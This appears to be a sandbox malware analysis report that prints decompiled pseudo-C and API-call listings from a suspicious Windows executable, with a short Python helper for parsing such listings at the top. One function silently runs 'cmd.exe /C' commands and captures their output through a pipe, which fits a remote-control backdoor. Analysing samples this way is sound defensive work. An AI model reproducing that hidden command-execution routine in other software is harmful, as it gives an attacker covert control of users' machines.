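"""

# Constructed excerpt from the GDI function's listing: the report prints SetDIBColorTable
# before FillRect although FillRect (ref 0042944C) is reached first in the code.
GDI_APIS = """
• SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,0042960C,?,00000000,0042962E), ref: 004294C6
• FillRect.USER32 ref: 0042944C
  • Part of subcall function 00424950: GetSysColor.USER32(?), ref: 0042495A
"""

if __name__ == "__main__":
    calls = parse_api_listing(TOLONGPATH_APIS)
    for c in in_function_order(calls):
        print(f"{c.ref:08x} {c.module}!{c.api}")
    print("resolved at runtime:", dynamically_resolved(calls))
```

Run it on the pasted listing of any function record; a non-empty result from dynamically_resolved is worth a look only when the names are not ordinary RTL feature probes like the GetLongPathNameA lookup here.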

                                                    C-Code - Quality: 83%
                                                    			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				char _v12;
                                                    				intOrPtr _t149;
                                                    				intOrPtr _t154;
                                                    				intOrPtr _t155;
                                                    				intOrPtr _t160;
                                                    				intOrPtr _t162;
                                                    				intOrPtr _t163;
                                                    				void* _t165;
                                                    				struct HWND__* _t166;
                                                    				long _t176;
                                                    				signed int _t198;
                                                    				signed int _t199;
                                                    				long _t220;
                                                    				intOrPtr _t226;
                                                    				int _t231;
                                                    				intOrPtr _t232;
                                                    				intOrPtr _t241;
                                                    				intOrPtr _t245;
                                                    				signed int _t248;
                                                    				intOrPtr _t251;
                                                    				intOrPtr _t252;
                                                    				signed int _t258;
                                                    				long _t259;
                                                    				intOrPtr _t262;
                                                    				intOrPtr _t266;
                                                    				signed int _t269;
                                                    				intOrPtr _t270;
                                                    				intOrPtr _t271;
                                                    				signed int _t277;
                                                    				long _t278;
                                                    				intOrPtr _t281;
                                                    				signed int _t286;
                                                    				signed int _t287;
                                                    				long _t290;
                                                    				intOrPtr _t294;
                                                    				struct HWND__* _t299;
                                                    				signed int _t301;
                                                    				signed int _t302;
                                                    				signed int _t305;
                                                    				signed int _t307;
                                                    				long _t308;
                                                    				signed int _t311;
                                                    				signed int _t313;
                                                    				long _t314;
                                                    				signed int _t317;
                                                    				signed int _t318;
                                                    				void* _t323;
                                                    				signed int _t326;
                                                    				long _t328;
                                                    				intOrPtr _t331;
                                                    				intOrPtr _t362;
                                                    				long _t370;
                                                    				void* _t372;
                                                    				void* _t373;
                                                    				intOrPtr _t374;
                                                    
                                                    				_t372 = _t373;
                                                    				_t374 = _t373 + 0xfffffff8;
                                                    				_v12 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t372);
                                                    				_push(0x456ec6);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t374;
                                                    				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                                    					_t294 =  *0x49de28; // 0x422f40
                                                    					E00406A70(_t294,  &_v12);
                                                    					E0040D144(_v12, 1);
                                                    					E00404378();
                                                    				}
                                                    				_t149 =  *0x49ebb8; // 0x0
                                                    				E0045B100(_t149);
                                                    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                                    				_push(_t372);
                                                    				_push(0x456ea9);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t374;
                                                    				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                    					_t155 = _v8;
                                                    					_t378 =  *((char*)(_t155 + 0x1a6));
                                                    					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                    						_push(_t372);
                                                    						_push(0x456db0);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t374;
                                                    						L00403DE8(_v8, __eflags);
                                                    						_pop(_t323);
                                                    						 *[fs:eax] = 0;
                                                    						_t160 =  *0x49ebbc; // 0x0
                                                    						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                    						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                    							__eflags = 0;
                                                    							L00455B08(_v8, 0);
                                                    						}
                                                    						_t162 = _v8;
                                                    						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                    						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                    							_t163 = _v8;
                                                    							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                                    							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                                    								_t299 = 0;
                                                    								_t165 = E00441704(_v8);
                                                    								_t166 = GetActiveWindow();
                                                    								__eflags = _t165 - _t166;
                                                    								if(_t165 == _t166) {
                                                    									_t176 = IsIconic(E00441704(_v8));
                                                    									__eflags = _t176;
                                                    									if(_t176 == 0) {
                                                    										_t299 = E00451750(E00441704(_v8));
                                                    									}
                                                    								}
                                                    								__eflags = _t299;
                                                    								if(_t299 == 0) {
                                                    									ShowWindow(E00441704(_v8), 0);
                                                    								} else {
                                                    									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                    									SetActiveWindow(_t299);
                                                    								}
                                                    							} else {
                                                    								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                    							}
                                                    						} else {
                                                    							E0043EC5C(_v8, _t323);
                                                    						}
                                                    					} else {
                                                    						_push(_t372);
                                                    						_push(0x456a14);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t374;
                                                    						L00403DE8(_v8, _t378);
                                                    						 *[fs:eax] = 0;
                                                    						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                    							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                    								_t301 = E004581F4() -  *(_v8 + 0x48);
                                                    								__eflags = _t301;
                                                    								_t302 = _t301 >> 1;
                                                    								if(_t301 < 0) {
                                                    									asm("adc ebx, 0x0");
                                                    								}
                                                    								_t198 = E004581E8() -  *(_v8 + 0x4c);
                                                    								__eflags = _t198;
                                                    								_t199 = _t198 >> 1;
                                                    								if(_t198 < 0) {
                                                    									asm("adc eax, 0x0");
                                                    								}
                                                    							} else {
                                                    								_t241 =  *0x49ebb8; // 0x0
                                                    								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                    								_t302 = _t305 >> 1;
                                                    								if(_t305 < 0) {
                                                    									asm("adc ebx, 0x0");
                                                    								}
                                                    								_t245 =  *0x49ebb8; // 0x0
                                                    								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                    								_t199 = _t248 >> 1;
                                                    								if(_t248 < 0) {
                                                    									asm("adc eax, 0x0");
                                                    								}
                                                    							}
                                                    							if(_t302 < 0) {
                                                    								_t302 = 0;
                                                    							}
                                                    							if(_t199 < 0) {
                                                    								_t199 = 0;
                                                    							}
                                                    							_t326 = _t199;
                                                    							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    							if( *((char*)(_v8 + 0x57)) != 0) {
                                                    								E00454DB8(_v8, _t326);
                                                    							}
                                                    						} else {
                                                    							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                    							__eflags = _t251 + 0xfa - 2;
                                                    							if(_t251 + 0xfa - 2 >= 0) {
                                                    								__eflags = _t251 - 5;
                                                    								if(_t251 == 5) {
                                                    									_t252 = _v8;
                                                    									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                    									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                    										_t307 = E00458224() -  *(_v8 + 0x48);
                                                    										__eflags = _t307;
                                                    										_t308 = _t307 >> 1;
                                                    										if(_t307 < 0) {
                                                    											asm("adc ebx, 0x0");
                                                    										}
                                                    										_t258 = E00458218() -  *(_v8 + 0x4c);
                                                    										__eflags = _t258;
                                                    										_t259 = _t258 >> 1;
                                                    										if(_t258 < 0) {
                                                    											asm("adc eax, 0x0");
                                                    										}
                                                    									} else {
                                                    										_t262 =  *0x49ebb8; // 0x0
                                                    										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                    										__eflags = _t311;
                                                    										_t308 = _t311 >> 1;
                                                    										if(_t311 < 0) {
                                                    											asm("adc ebx, 0x0");
                                                    										}
                                                    										_t266 =  *0x49ebb8; // 0x0
                                                    										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                    										__eflags = _t269;
                                                    										_t259 = _t269 >> 1;
                                                    										if(_t269 < 0) {
                                                    											asm("adc eax, 0x0");
                                                    										}
                                                    									}
                                                    									__eflags = _t308;
                                                    									if(_t308 < 0) {
                                                    										_t308 = 0;
                                                    										__eflags = 0;
                                                    									}
                                                    									__eflags = _t259;
                                                    									if(_t259 < 0) {
                                                    										_t259 = 0;
                                                    										__eflags = 0;
                                                    									}
                                                    									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    								}
                                                    							} else {
                                                    								_t270 =  *0x49ebb8; // 0x0
                                                    								_t370 =  *(_t270 + 0x44);
                                                    								_t271 = _v8;
                                                    								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                    								if( *((char*)(_t271 + 0x230)) == 7) {
                                                    									_t362 =  *0x44ff0c; // 0x44ff58
                                                    									_t290 = L00403D78( *(_v8 + 4), _t362);
                                                    									__eflags = _t290;
                                                    									if(_t290 != 0) {
                                                    										_t370 =  *(_v8 + 4);
                                                    									}
                                                    								}
                                                    								__eflags = _t370;
                                                    								if(_t370 == 0) {
                                                    									_t313 = E004581F4() -  *(_v8 + 0x48);
                                                    									__eflags = _t313;
                                                    									_t314 = _t313 >> 1;
                                                    									if(_t313 < 0) {
                                                    										asm("adc ebx, 0x0");
                                                    									}
                                                    									_t277 = E004581E8() -  *(_v8 + 0x4c);
                                                    									__eflags = _t277;
                                                    									_t278 = _t277 >> 1;
                                                    									if(_t277 < 0) {
                                                    										asm("adc eax, 0x0");
                                                    									}
                                                    								} else {
                                                    									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                    									__eflags = _t317;
                                                    									_t318 = _t317 >> 1;
                                                    									if(_t317 < 0) {
                                                    										asm("adc ebx, 0x0");
                                                    									}
                                                    									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                    									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                    									__eflags = _t286;
                                                    									_t287 = _t286 >> 1;
                                                    									if(_t286 < 0) {
                                                    										asm("adc eax, 0x0");
                                                    									}
                                                    									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                    								}
                                                    								__eflags = _t314;
                                                    								if(_t314 < 0) {
                                                    									_t314 = 0;
                                                    									__eflags = 0;
                                                    								}
                                                    								__eflags = _t278;
                                                    								if(_t278 < 0) {
                                                    									_t278 = 0;
                                                    									__eflags = 0;
                                                    								}
                                                    								_t328 = _t278;
                                                    								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    								_t281 = _v8;
                                                    								__eflags =  *((char*)(_t281 + 0x57));
                                                    								if( *((char*)(_t281 + 0x57)) != 0) {
                                                    									E00454DB8(_v8, _t328);
                                                    								}
                                                    							}
                                                    						}
                                                    						 *((char*)(_v8 + 0x230)) = 0;
                                                    						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                    							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                    						} else {
                                                    							if( *(_v8 + 0x22b) != 2) {
                                                    								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                    								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                    								__eflags = _t220;
                                                    								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
                                                    								E0043B1DC();
                                                    							} else {
                                                    								_t231 = E00441704(_v8);
                                                    								_t232 =  *0x49ebb8; // 0x0
                                                    								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                    								ShowWindow(E00441704(_v8), 3);
                                                    							}
                                                    							_t226 =  *0x49ebb8; // 0x0
                                                    							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t331);
                                                    				 *[fs:eax] = _t331;
                                                    				_push(0x456eb0);
                                                    				_t154 = _v8;
                                                    				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                                    				return _t154;
                                                    			}
                                                    0x00456bb4
                                                    0x00456bb6
                                                    0x00456bb8
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bca
                                                    0x00456bd3
                                                    0x00456bd9
                                                    0x00456bdc
                                                    0x00456be0
                                                    0x00456be9
                                                    0x00456be9
                                                    0x00456be0
                                                    0x00456b1f
                                                    0x00456c9b
                                                    0x00456cac
                                                    0x00456d82
                                                    0x00456cb2
                                                    0x00456cbc
                                                    0x00456d0f
                                                    0x00456d23
                                                    0x00456d23
                                                    0x00456d38
                                                    0x00456d40
                                                    0x00456cbe
                                                    0x00456cc3
                                                    0x00456cce
                                                    0x00456cdd
                                                    0x00456ced
                                                    0x00456ced
                                                    0x00456d4e
                                                    0x00456d5d
                                                    0x00456d5d
                                                    0x00456cac
                                                    0x004569ea
                                                    0x00456e93
                                                    0x00456e96
                                                    0x00456e99
                                                    0x00456e9e
                                                    0x00456ea1
                                                    0x00456ea8

                                                    APIs
                                                    • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00456CDD
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LoadMessageSendString
                                                    • String ID: @/B
                                                    • API String ID: 1946433856-85281795
                                                    • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                    • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				long _v24;
                                                    				char _v28;
                                                    				struct _SECURITY_ATTRIBUTES _v40;
                                                    				struct _STARTUPINFOA _v108;
                                                    				struct _PROCESS_INFORMATION _v124;
                                                    				char _v380;
                                                    				char _v384;
                                                    				char _v388;
                                                    				CHAR* _t77;
                                                    				void* _t112;
                                                    				intOrPtr _t125;
                                                    				intOrPtr _t126;
                                                    				void* _t131;
                                                    				void* _t133;
                                                    				void* _t134;
                                                    				intOrPtr _t135;
                                                    
                                                    				_t133 = _t134;
                                                    				_t135 = _t134 + 0xfffffe80;
                                                    				_v388 = 0;
                                                    				_v384 = 0;
                                                    				_v28 = 0;
                                                    				_t131 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t133);
                                                    				_push(0x4755bb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t135;
                                                    				E004049C0(__ecx);
                                                    				_v40.nLength = 0xc;
                                                    				_v40.bInheritHandle = 0xffffffff;
                                                    				_v40.lpSecurityDescriptor = 0;
                                                    				CreatePipe( &_v16,  &_v20,  &_v40, 0);
                                                    				_push(_t133);
                                                    				_push(0x475581);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t135;
                                                    				E004032B4( &_v108, 0x44);
                                                    				_v108.cb = 0x44;
                                                    				_v108.dwFlags = 0x101;
                                                    				_v108.wShowWindow = 0;
                                                    				_v108.hStdInput = GetStdHandle(0xfffffff6);
                                                    				_v108.hStdOutput = _v20;
                                                    				_v108.hStdError = _v20;
                                                    				if(E00409A58(_v12) == 0) {
                                                    					E00404A58( &_v28, 0x4755d0);
                                                    				} else {
                                                    					E00404A58( &_v28, _v12);
                                                    				}
                                                    				_t77 = E00404E80(_v28);
                                                    				E00404CCC( &_v384, _v8, "cmd.exe /C ");
                                                    				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
                                                    				asm("sbb ebx, ebx");
                                                    				_t112 = 1;
                                                    				CloseHandle(_v20);
                                                    				if(1 == 0) {
                                                    					_pop(_t125);
                                                    					 *[fs:eax] = _t125;
                                                    					_push(0x475588);
                                                    					return CloseHandle(_v16);
                                                    				} else {
                                                    					_push(_t133);
                                                    					_push(0x475563);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t135;
                                                    					do {
                                                    						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
                                                    						asm("sbb ebx, ebx");
                                                    						_t112 = _t112 + 1;
                                                    						if(_v24 > 0) {
                                                    							 *((char*)(_t133 + _v24 - 0x178)) = 0;
                                                    							OemToCharA( &_v380,  &_v380);
                                                    							E00404C30( &_v388, 0x100,  &_v380);
                                                    							E00404C88(_t131, _v388);
                                                    						}
                                                    					} while (_t112 != 0 && _v24 != 0);
                                                    					WaitForSingleObject(_v124.hProcess, 0xffffffff);
                                                    					_pop(_t126);
                                                    					 *[fs:eax] = _t126;
                                                    					_push(0x47556a);
                                                    					CloseHandle(_v124.hThread);
                                                    					return CloseHandle(_v124);
                                                    				}
                                                    			}


                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
                                                      • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                    • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                    • OemToCharA.USER32 ref: 00475506
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                    • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                    • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                    • String ID: C:\$D$cmd.exe /C
                                                    • API String ID: 3269375759-2807548070
                                                    • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                    • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				struct HMENU__* _v12;
                                                    				signed int _v16;
                                                    				char _v17;
                                                    				intOrPtr _v24;
                                                    				int _v28;
                                                    				struct HDC__* _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				intOrPtr _v44;
                                                    				intOrPtr* _v48;
                                                    				char _v52;
                                                    				intOrPtr _t137;
                                                    				signed int _t138;
                                                    				struct HWND__* _t144;
                                                    				signed int _t150;
                                                    				signed int _t151;
                                                    				intOrPtr* _t153;
                                                    				void* _t158;
                                                    				struct HMENU__* _t160;
                                                    				intOrPtr* _t165;
                                                    				void* _t173;
                                                    				signed int _t177;
                                                    				signed int _t181;
                                                    				void* _t182;
                                                    				void* _t214;
                                                    				void* _t252;
                                                    				signed int _t258;
                                                    				void* _t266;
                                                    				signed int _t272;
                                                    				signed int _t273;
                                                    				signed int _t275;
                                                    				signed int _t276;
                                                    				signed int _t278;
                                                    				signed int _t279;
                                                    				signed int _t281;
                                                    				signed int _t282;
                                                    				signed int _t284;
                                                    				signed int _t285;
                                                    				signed int _t287;
                                                    				signed int _t288;
                                                    				signed int _t291;
                                                    				signed int _t292;
                                                    				intOrPtr _t308;
                                                    				intOrPtr _t312;
                                                    				intOrPtr _t334;
                                                    				intOrPtr _t343;
                                                    				intOrPtr _t347;
                                                    				intOrPtr* _t354;
                                                    				signed int _t356;
                                                    				intOrPtr* _t357;
                                                    				signed int _t368;
                                                    				signed int _t369;
                                                    				signed int _t370;
                                                    				signed int _t371;
                                                    				signed int _t372;
                                                    				signed int _t373;
                                                    				signed int _t374;
                                                    				intOrPtr* _t376;
                                                    				void* _t378;
                                                    				void* _t379;
                                                    				intOrPtr _t380;
                                                    				void* _t381;
                                                    
                                                    				_t378 = _t379;
                                                    				_t380 = _t379 + 0xffffffd0;
                                                    				_v52 = 0;
                                                    				_t376 = __edx;
                                                    				_v8 = __eax;
                                                    				_push(_t378);
                                                    				_push(0x44ef73);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t380;
                                                    				_t137 =  *__edx;
                                                    				_t381 = _t137 - 0x111;
                                                    				if(_t381 > 0) {
                                                    					_t138 = _t137 - 0x117;
                                                    					__eflags = _t138;
                                                    					if(_t138 == 0) {
                                                    						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    						__eflags = _t272;
                                                    						if(_t272 < 0) {
                                                    							goto L67;
                                                    						} else {
                                                    							_t273 = _t272 + 1;
                                                    							_t368 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								_t150 = L0044DDEC(E0041AC6C(_v8, _t368),  *(_t376 + 4), __eflags);
                                                    								__eflags = _t150;
                                                    								if(_t150 != 0) {
                                                    									goto L68;
                                                    								}
                                                    								_t368 = _t368 + 1;
                                                    								_t273 = _t273 - 1;
                                                    								__eflags = _t273;
                                                    								if(_t273 != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L67;
                                                    								}
                                                    								goto L68;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t151 = _t138 - 8;
                                                    						__eflags = _t151;
                                                    						if(_t151 == 0) {
                                                    							_v17 = 0;
                                                    							__eflags =  *(__edx + 6) & 0x00000010;
                                                    							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                    								_v17 = 1;
                                                    							}
                                                    							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    							__eflags = _t275;
                                                    							if(__eflags < 0) {
                                                    								L32:
                                                    								_t153 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B010( *_t153, 0, __eflags);
                                                    								goto L67;
                                                    							} else {
                                                    								_t276 = _t275 + 1;
                                                    								_t369 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									__eflags = _v17 - 1;
                                                    									if(_v17 != 1) {
                                                    										_v12 =  *(_t376 + 4) & 0x0000ffff;
                                                    									} else {
                                                    										_t160 =  *(_t376 + 8);
                                                    										__eflags = _t160;
                                                    										if(_t160 == 0) {
                                                    											_v12 = 0xffffffff;
                                                    										} else {
                                                    											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
                                                    										}
                                                    									}
                                                    									_t158 = E0041AC6C(_v8, _t369);
                                                    									_t296 = _v17;
                                                    									_v16 = L0044DD30(_t158, _v17, _v12);
                                                    									__eflags = _v16;
                                                    									if(__eflags != 0) {
                                                    										break;
                                                    									}
                                                    									_t369 = _t369 + 1;
                                                    									_t276 = _t276 - 1;
                                                    									__eflags = _t276;
                                                    									if(__eflags != 0) {
                                                    										continue;
                                                    									} else {
                                                    										goto L32;
                                                    									}
                                                    									goto L68;
                                                    								}
                                                    								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
                                                    								_t165 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B010( *_t165, _v52, __eflags);
                                                    							}
                                                    						} else {
                                                    							__eflags = _t151 == 1;
                                                    							if(_t151 == 1) {
                                                    								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    								__eflags = _t278;
                                                    								if(_t278 < 0) {
                                                    									goto L67;
                                                    								} else {
                                                    									_t279 = _t278 + 1;
                                                    									_t370 = 0;
                                                    									__eflags = 0;
                                                    									while(1) {
                                                    										_v48 = E0041AC6C(_v8, _t370);
                                                    										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                    										__eflags = _t173 -  *(_t376 + 8);
                                                    										if(_t173 ==  *(_t376 + 8)) {
                                                    											break;
                                                    										}
                                                    										_t177 = L0044DD30(_v48, 1,  *(_t376 + 8));
                                                    										__eflags = _t177;
                                                    										if(_t177 == 0) {
                                                    											_t370 = _t370 + 1;
                                                    											_t279 = _t279 - 1;
                                                    											__eflags = _t279;
                                                    											if(_t279 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												goto L67;
                                                    											}
                                                    										} else {
                                                    											break;
                                                    										}
                                                    										goto L68;
                                                    									}
                                                    									E0044E630(_v48, _t376);
                                                    								}
                                                    							} else {
                                                    								goto L67;
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L68;
                                                    				} else {
                                                    					if(_t381 == 0) {
                                                    						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    						__eflags = _t281;
                                                    						if(_t281 < 0) {
                                                    							goto L67;
                                                    						} else {
                                                    							_t282 = _t281 + 1;
                                                    							_t371 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								E0041AC6C(_v8, _t371);
                                                    								_t181 = L0044DDD0( *(_t376 + 4), __eflags);
                                                    								__eflags = _t181;
                                                    								if(_t181 != 0) {
                                                    									goto L68;
                                                    								}
                                                    								_t371 = _t371 + 1;
                                                    								_t282 = _t282 - 1;
                                                    								__eflags = _t282;
                                                    								if(_t282 != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L67;
                                                    								}
                                                    								goto L68;
                                                    							}
                                                    						}
                                                    						goto L68;
                                                    					} else {
                                                    						_t182 = _t137 - 0x2b;
                                                    						if(_t182 == 0) {
                                                    							_v40 =  *((intOrPtr*)(__edx + 8));
                                                    							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    							__eflags = _t284;
                                                    							if(_t284 < 0) {
                                                    								goto L67;
                                                    							} else {
                                                    								_t285 = _t284 + 1;
                                                    								_t372 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_v16 = L0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
                                                    									__eflags = _v16;
                                                    									if(_v16 != 0) {
                                                    										break;
                                                    									}
                                                    									_t372 = _t372 + 1;
                                                    									_t285 = _t285 - 1;
                                                    									__eflags = _t285;
                                                    									if(_t285 != 0) {
                                                    										continue;
                                                    									} else {
                                                    										goto L67;
                                                    									}
                                                    									goto L69;
                                                    								}
                                                    								_v24 = E0042572C(0, 1);
                                                    								_push(_t378);
                                                    								_push(0x44eda6);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t380;
                                                    								_v28 = SaveDC( *(_v40 + 0x18));
                                                    								_push(_t378);
                                                    								_push(0x44ed89);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t380;
                                                    								L00425CE8(_v24,  *(_v40 + 0x18));
                                                    								L00425B88(_v24);
                                                    								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                    								_pop(_t334);
                                                    								 *[fs:eax] = _t334;
                                                    								_push(0x44ed90);
                                                    								__eflags = 0;
                                                    								L00425CE8(_v24, 0);
                                                    								return RestoreDC( *(_v40 + 0x18), _v28);
                                                    							}
                                                    						} else {
                                                    							_t214 = _t182 - 1;
                                                    							if(_t214 == 0) {
                                                    								_v44 =  *((intOrPtr*)(__edx + 8));
